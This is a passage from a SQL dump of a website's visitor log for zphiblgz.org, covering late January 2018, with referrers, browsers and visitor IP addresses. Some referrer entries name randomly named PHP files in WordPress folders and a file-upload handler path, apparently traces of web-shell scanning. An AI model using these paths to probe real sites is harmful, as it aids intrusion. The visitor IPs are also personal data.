ZkNGTDFqWG00eUV1cGZkMDdBcHRNZ3pJUlAzT0lFUEE0LVFWZy1KeU5OUSws&sign=12397918a9841ec474f6323a09cea566&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.194.84','000',2,0),(17739,'2018-01-28','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(17740,'2018-01-28','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1680.7u-8zA-NvRRqS9SQJZBeKcSOH759fFK0FYJU0db-ZjM.25d01e6b1a187140e178e560651b25b078b341c4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WWw1SFU1Sm5hZjlxcUhYV3NIQWQxakFjNlY4RGdWMXdPN0lTcE03a0RzUSws&sign=e3cc0f79fa859b45ea09b1b54be247a1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.239.118','000',2,0),(17741,'2018-01-28','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1680.atAs93mwgHtro5n8xrn_9ufWx0a-G1DBLmXBMVuJOn0.e39f3a2b6c443289846750636607881242bdf7ad&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042V1ZVbENBR3YxTThvRjFZVHhrX19ZREFLRmd3QWNjTnJYWWtLd2JySXJFQSws&sign=934ccfeaef8e05db25de146287e04450&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.197.207','000',2,0),(17742,'2018-01-28','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(17743,'2018-01-28','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','173.67.32.133','000',4,0),(17744,'2018-01-28','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.213.165.89','000',6,0),(17745,'2018-01-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(17746,'2018-01-28','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(17747,'2018-01-28','http://zphiblgz.org/members/wp-includes/Requests/Auth/Basic.php','Safari','iPhone','10.0','','182.50.130.50','000',1,0),(17748,'2018-01-28','http://zphiblgz.org/members/wp-includes/ID3/getid3.php','Chrome','Windows','44.0.2403.155','','177.12.174.49','000',1,0),(17749,'2018-01-28','http://zphiblgz.org/development/wp-admin/css/colors/ddlcpune.php','Chrome','Windows','59.0.3071.115','','162.241.226.58','000',1,0),(17750,'2018-01-28','http://zphiblgz.org/development/wp-includes/random_compat/gcsrtnpz.php','Safari','iPad','10.0','','182.50.130.146','000',1,0),(17751,'2018-01-28','http://zphiblgz.org/members/wp-admin/images/xdrntpal.php','Chrome','Windows','45.0.2454.85','','192.185.82.181','000',1,0),(17752,'2018-01-28','http://zphiblgz.org/wp-content/ngg/modules/photocrati-frame_communication/uivugaoc.php','Chrome','Windows','59.0.3071.115','','47.74.226.4','000',1,0),(17753,'2018-01-28','http://zphiblgz.org/cache/mod_mainmenu/flunqswo.php','Edge','Windows','15.15063','','50.62.208.198','000',1,0),(17754,'2018-01-28','http://zphiblgz.org/Development/wp-includes/class-wp-post.php','MSIE','Windows','11.0','','184.168.46.190','000',1,0),(17755,'2018-01-28','http://zphiblgz.org/f15600.php','Edge','Windows','14.14393','','87.236.20.80','000',1,0),(17756,'2018-01-28','http://zphiblgz.org/members/wp-includes/Text/acbhahba.php','Safari','iPhone','10.0','','50.63.194.14','000',1,0),(17757,'2018-01-28','https://zphiblgz.org','Firefox','Windows','40.1','','185.94.134.20','000',2,0),(17758,'2018-01-28','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','186.204.68.84','000',2,0),(17759,'2018-01-28','https://zphiblgz.org','MSIE','Windows','11.0','','192.198.80.227','000',2,0),(17760,'2018-01-28','https://zphiblgz.org','Firefox','Windows','40.1','','86.146.115.29','000',2,0),(17761,'2018-01-28','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','173.66.209.25','000',9,0),(17762,'2018-01-28','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(17763,'2018-01-28','https://www.google.com/','Chrome','Macintosh','63.0.3239.132','','68.33.77.221','000',3,0),(17764,'2018-01-28','https://zphiblgz.org','Chrome','Macintosh','57.0.2987.133','','46.229.170.197','000',1,0),(17765,'2018-01-28','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(17766,'2018-01-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(17767,'2018-01-28','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(17768,'2018-01-28','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(17769,'2018-01-28','https://zphiblgz.org','Go--client','Unknown','1.1','','174.138.63.96','000',2,0),(17770,'2018-01-28','https://www.google.com/','Chrome','Windows','63.0.3239.132','','67.85.47.90','000',1,0),(17771,'2018-01-28','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjclZ2UyPvYAhUDSK0KHTsIBOUQFggzMAI&url=https%3A%2F%2Fzphiblgz.org%2Fscholarship%2Frecommendation%2F&usg=AOvVaw31mHL4CN8h5PiqoZdsytoG','MSIE','Windows','11.0','','75.108.86.20','000',3,0),(17772,'2018-01-28','https://zphiblgz.org','Test','Unknown','Unknown','','75.108.86.20','000',1,0),(17773,'2018-01-28','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(17774,'2018-01-28','http://zphiblgz.org/','MSIE','Windows','11.0','','109.90.163.199','000',1,0),(17775,'2018-01-28','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','71.121.235.184','000',8,0),(17776,'2018-01-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17777,'2018-01-28','https://www.google.com/','Safari','Macintosh','10.1.2','','71.244.140.126','000',2,0),(17778,'2018-01-28','https://zphiblgz.org','Firefox','Windows','40.1','','99.237.3.184','000',2,0),(17779,'2018-01-28','74.220.219.51','Firefox','Windows','33.0','','107.170.96.6','000',1,0),(17780,'2018-01-28','https://zphiblgz.org','Firefox','Windows','40.1','','95.187.145.118','000',2,0),(17781,'2018-01-28','http://zphiblgz.org/theme/assets/global/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','209.90.225.242','000',1,0),(17782,'2018-01-28','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.16','000',1,0),(17783,'2018-01-28','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.28','000',1,0),(17784,'2018-01-28','https://www.google.com/','Safari','Macintosh','10.1.1','','73.106.72.242','000',1,0),(17785,'2018-01-28','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(17786,'2018-01-28','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.46.85','000',1,0),(17787,'2018-01-28','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.16','000',2,0),(17788,'2018-01-28','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','198.27.80.144','000',2,0),(17789,'2018-01-29','https://zphiblgz.org','Chrome','Windows','14.0.815.0','','217.147.169.238','000',2,0),(17790,'2018-01-29','https://zphiblgz.org','Chrome','Linux','10.0.634.0','','217.147.169.238','000',1,0),(17791,'2018-01-29','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','217.147.169.238','000',1,0),(17792,'2018-01-29','http://zphiblgz.org/','MSIE','Windows','6.0','','36.79.206.68','000',1,0),(17793,'2018-01-29','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(17794,'2018-01-29','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(17795,'2018-01-29','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.35','000',1,0),(17796,'2018-01-29','https://zphiblgz.org/cause/scholarship/','AppleWebKit','Windows','534','','131.253.27.110','000',1,0),(17797,'2018-01-29','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',2,0),(17798,'2018-01-29','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(17799,'2018-01-29','https://www.google.com/','SamsungBrowser','Android','6.2','','173.67.10.163','000',4,0),(17800,'2018-01-29','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(17801,'2018-01-29','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1681.TzUo4RT5fFo-seOxdJXQZptbhlf47LQwaFNAFlBqu3w.6111a270c9d9eaa36bebbf44826aaaa1b83c5ca8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RERIaVViRXJDMmxXcnliNDhndXBINExPVlRUbWVNREI1YU1rb3ROdzhJZyws&sign=58a4c39ee37b9fcba8f598b7ccd59751&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.219.21','000',2,0),(17802,'2018-01-29','http://translate.google.com/translate?hl=auto&amp;langpair=auto%7Cca&amp;u=https%3A%2F%2Fus8.campaign-archive.com%2F%3Fu%3Dfd39df0048c8cb4aa7128a390%26amp%3Bid%3D50b0fcf33f','Chrome','Windows','50.0.2661.102','','94.23.45.37','000',2,0),(17803,'2018-01-29','https://zphiblgz.org','Safari','iPhone','604.4.7','','174.205.15.68','000',6,0),(17804,'2018-01-29','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1681.2M32WB9zG55l-3ISmk8gbgFkof8w2hl8hbFHMwdLfkE.0ed84f946443593e3379cf250172b62187342b80&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Smh1YmstMjFoOFUxWWtMdFhmd212cC1QRW5HWVZFVmdRbEZDMjhNeXBRQSws&sign=5f835c84d2dd9f416ba20bc8ba7504ab&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.170.186','000',2,0),(17805,'2018-01-29','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1681.UoUs6T-Eyu31OvpE7_uA0TS_xlp0CI7EEdEy94dU6eg.be44d64aec43f6b92dc6b3a05d6f08b64fda1cae&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043YWs3U3llaFl0MEhZb25weUJqT21fZjlocklHM25Ma3p3S2F6S0VIQVh6Zyws&sign=60c73470ee9cf8d66d95005e1170a4a2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.47.151','000',2,0),(17806,'2018-01-29','https://zphiblgz.org','MSIE','Windows','8.0','','178.154.148.67','000',1,0),(17807,'2018-01-29','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.30','000',1,0),(17808,'2018-01-29','https://zphiblgz.org','Firefox','Windows','40.1','','212.36.201.163','000',2,0),(17809,'2018-01-29','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1681.W6dtHxOEVP0PbY6dBygbaE47Z87ygLyLNjCJndu2CrI.dbb7b51b958fa89be3afe48fc0116efc8d6f53ca&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042R1g0S2YzSHZKUTRmYmtiYXBWZzBxb0JQOGtiVlRLQjIxZ29kb2NhOVZjUSws&sign=97f5e8b67717fd56c77a8a8fdc203b38&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','149.56.128.37','000',2,0),(17810,'2018-01-29','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.70.86','000',1,0),(17811,'2018-01-29','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(17812,'2018-01-29','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(17813,'2018-01-29','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','192.198.80.227','000',2,0),(17814,'2018-01-29','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',1,0),(17815,'2018-01-29','https://zphiblgz.org','Safari','iPad','11.0','','107.77.204.210','000',6,0),(17816,'2018-01-29','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','50.225.39.79','000',5,0),(17817,'2018-01-29','http://zphiblgz.org/history/','Safari','iPhone','7.0','','40.77.179.135','000',1,0),(17818,'2018-01-29','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(17819,'2018-01-29','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.48.10','000',2,0),(17820,'2018-01-29','https://www.google.com/','Safari','iPhone','11.0','','75.145.95.41','000',3,0),(17821,'2018-01-29','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.172','000',1,0),(17822,'2018-01-29','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.133','000',1,0),(17823,'2018-01-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.141','000',1,0),(17824,'2018-01-29','https://www.google.com/','Safari','iPhone','10.0','','192.55.241.100','000',2,0),(17825,'2018-01-29','https://zphiblgz.org','Firefox','Windows','57.0','','198.51.197.42','000',4,0),(17826,'2018-01-29','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(17827,'2018-01-29','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.28','000',1,0),(17828,'2018-01-29','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.28','000',1,0),(17829,'2018-01-29','https://www.google.com/','Firefox','Windows','52.0','','8.44.100.11','000',5,0),(17830,'2018-01-29','https://search.yahoo.com/','Chrome','Windows','63.0.3239.132','','69.195.247.116','000',7,0),(17831,'2018-01-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(17832,'2018-01-29','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(17833,'2018-01-29','https://zphiblgz.org','Firefox','Windows','40.1','','171.224.93.126','000',2,0),(17834,'2018-01-29','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','216.158.194.83','000',2,0),(17835,'2018-01-29','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATNk7hr6yL5xQ0cOz4eMYApi9iLUsifhD5BcYY5mCd0_0WZ4vlGqdBC7X2iyAPYhAXiYFMtPOXDqDNaVntV5P9XLOvmOzpNHaVTecvdCQ9xFQI5ozBZ-9A','AppleWebKit','iPhone','604.4.7','','73.171.86.45','000',11,0),(17836,'2018-01-29','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(17837,'2018-01-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17838,'2018-01-29','https://zphiblgz.org','Firefox','Windows','40.1','','113.23.17.30','000',2,0),(17839,'2018-01-29','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(17840,'2018-01-29','https://www.google.com/','Edge','Windows','16.16299','','76.21.167.41','000',3,0),(17841,'2018-01-29','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.132','','71.121.235.184','000',3,0),(17842,'2018-01-29','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.128.239.206','000',2,0),(17843,'2018-01-29','https://www.google.co.jp/','Safari','iPhone','10.0','','126.33.65.255','000',3,0),(17844,'2018-01-29','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','49.144.48.5','000',3,0),(17845,'2018-01-29','http://www.google.com/url?sa=t&rct=j&q=zphiblgz.org&source=web&cd=5&ved=0CF0QFjAE&url=http:%2F%2Fzphiblgz.org%2F&cad=rja','Lynx','Unknown','2.8.5rel.1','','78.158.28.10','000',1,0),(17846,'2018-01-29','http://site.ru','Chrome','Windows','5.0.375.99','','194.150.113.92','000',2,0),(17847,'2018-01-30','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','172.58.20.182','000',3,0),(17848,'2018-01-30','http://site.ru','Chrome','Windows','5.0.375.99','','91.240.87.143','000',2,0),(17849,'2018-01-30','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(17850,'2018-01-30','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.27','000',1,0),(17851,'2018-01-30','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(17852,'2018-01-30','http://zphiblgz.org/download/constitution-by-laws/','Firefox','Windows','40.1','','146.185.223.111','000',1,0),(17853,'2018-01-30','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',3,0),(17854,'2018-01-30','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',2,0),(17855,'2018-01-30','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.28','000',1,0),(17856,'2018-01-30','https://zphiblgz.org','Opera','Unknown','9.15','','207.248.251.82','000',1,0),(17857,'2018-01-30','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(17858,'2018-01-30','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(17859,'2018-01-30','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(17860,'2018-01-30','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(17861,'2018-01-30','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(17862,'2018-01-30','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.35','000',1,0),(17863,'2018-01-30','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','74.85.210.223','000',2,0),(17864,'2018-01-30','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1682.HMcaHxYxOkKDyrYLJ4DgJqIPuepi7QGOmVevK-K-1ew.99f271489053b607978a47d4d2cd7ba538e573c9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041NEstYndhZVZuaDA0VTZmZjFKMVFKdG9FX1Z1by1xcDdJV2hXai02MEI5QSws&sign=4bfa237aa49ecded55402aeca6715b2d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(17865,'2018-01-30','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1682.gbFUVHNy6XOJiFStzulR3zl7pAv4zl16Z79D8yK_3bY.1b4824cad5bec0aae721892c6609ddd28717d138&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043TTk1V2xMbEpfY013T2czWl9hdXpCQWVDUXFrY1l6OHpnRkxpNUtyY0Nodyws&sign=d835ddb0c9db3a5e4890a0ef0380168f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.149.0','000',2,0),(17866,'2018-01-30','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1682.YLS3GvgGojXAfIRwjMyr5O-LZ9JgScKCBG8m4yZnhtc.63789ab16c34b3a57609dfc91244ec795a761d3a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043YWpnYjJUckhRbkpuTkl2MExUeFVhZGJ5aHpybUY5ZHByMUl4MVF3YWVFUSws&sign=59c325164bd89e0580713ee4dba64fbf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.22.153','000',2,0),(17867,'2018-01-30','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1682.lZ9aUqzKa0LaCDaqhP7DYwLZz7Ni-giI7meEe-kHJdY.7e8529027b3e11d01839102b9300b943353bba2a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040TXN6UFZIRmtZTUpLYWlJVWJaUUU0VFlxWThSZnl0T196aUpLVnR1WFdiQSws&sign=61fef3d23c2b63159b359e08d5549e22&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.186','000',2,0),(17868,'2018-01-30','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1682.XFqWKe9NTno_p_15aIniChqSy8Zfcw8cZ6zN2P7cz7I.4ac0b4298e749fa0b4132a55c803400a8c3615f5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ejJ2bVdsRlFTZmx0Y1VtWWRUWGpHUUE4clJYZHdvcGNPeGVjYU5adElHdyws&sign=2bd03a182735c4e1b7044b9622fa49d5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.108.40','000',2,0),(17869,'2018-01-30','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.35','000',1,0),(17870,'2018-01-30','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.12.130','000',2,0),(17871,'2018-01-30','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.9','000',1,0),(17872,'2018-01-30','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1682.V_xnFkdakFRAk40o0CasMxp2ZLT9S0HgE5z4aKbPdRc.fd1cd103554b9fbfff49001f7642f88bf50fe861&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040eTNwOFhvX2g3b25SSVJoMldVLUNFTHV6clh6UFh4MVFYRVJ0eHdVZXdmQSws&sign=08c499e667e0a61bdfcca5514114b5b5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.44.254','000',2,0),(17873,'2018-01-30','https://zphiblgz.org','Firefox','Windows','40.1','','151.48.53.14','000',2,0),(17874,'2018-01-30','http://site.ru','Chrome','Windows','5.0.375.99','','87.106.157.45','000',1,0),(17875,'2018-01-30','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(17876,'2018-01-30','https://www.bing.com/','Chrome','Windows','63.0.3239.84','','173.66.230.155','000',5,0),(17877,'2018-01-30','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(17878,'2018-01-30','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',2,0),(17879,'2018-01-30','https://www.google.com','Firefox','Macintosh','47.0','','50.225.39.87','000',4,0),(17880,'2018-01-30','https://zphiblgz.org','Firefox','Windows','40.1','','108.14.75.66','000',2,0),(17881,'2018-01-30','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(17882,'2018-01-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(17883,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.87','000',1,0),(17884,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.199','000',2,0),(17885,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.90','000',3,0),(17886,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',2,0),(17887,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(17888,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.219','000',1,0),(17889,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',2,0),(17890,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(17891,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.137','000',1,0),(17892,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.114','000',2,0),(17893,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.52','000',2,0),(17894,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.140','000',1,0),(17895,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.53','000',1,0),(17896,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.25','000',1,0),(17897,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.83','000',2,0),(17898,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.64','000',1,0),(17899,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.201','000',1,0),(17900,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.223','000',1,0),(17901,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',1,0),(17902,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.241','000',3,0),(17903,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(17904,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.112','000',1,0),(17905,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',1,0),(17906,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',4,0),(17907,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',1,0),(17908,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',2,0),(17909,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',1,0),(17910,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.128','000',1,0),(17911,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',2,0),(17912,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',1,0),(17913,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.80','000',1,0),(17914,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.53','000',1,0),(17915,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',3,0),(17916,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',1,0),(17917,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.86','000',2,0),(17918,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',2,0),(17919,'2018-01-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',3,0),(17920,'2018-01-30','h